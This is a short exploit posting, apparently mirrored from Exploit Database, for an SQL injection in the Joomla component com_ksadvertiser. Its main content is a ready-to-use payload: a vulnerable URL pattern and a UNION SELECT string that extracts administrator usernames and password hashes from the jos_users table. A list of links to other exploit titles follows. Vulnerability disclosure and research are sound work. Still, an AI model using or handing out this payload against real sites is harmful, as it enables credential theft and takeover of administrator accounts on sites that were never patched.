Joomla! Component com_ksadvertiser – SQL Injection

Exploit Database
77 阅读

作者： FL0RiX

日期： 2010-01-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11068/

########################################################################
#Joomla Component com_ksadvertiser SQL Injection Vulnerability
########################################################################
# Author :FL0RiX
#
# Name : com_ksadvertiser
#
# Bug Type : SQL Injection
#
# Infection: Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://server/index.php?option=com_ksadvertiser&pid=[EXPLOIT]&task=showcats
#
#EXPLOIT : null/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14/**/from/**/jos_users--
########################################################################

last Exploits
Joomla! Component com_ksadvertiser – SQL Injection的更多信息

ShopEx Single 4.5.1 – Multiple Vulnerabilities：
Symantec Messaging Gateway 9.5.3-3 – Arbitrary File Download：
CiMe Citas Médicas – Multiple Vulnerabilities：
Chyrp 2.x – ‘/admin/help.php’ Multiple Cross-Site Scripting Vulnerabilities：
Ticketly 1.0 – Cross-Site Request Forgery (Add Admin)：
Yamamah 1.0 – SQL Injection：
phpMyAdmin 2.6.3-pl1 – Cross-Site Scripting / Full Path：
Sonicwall SonicOS 7.0 – Host Header Injection：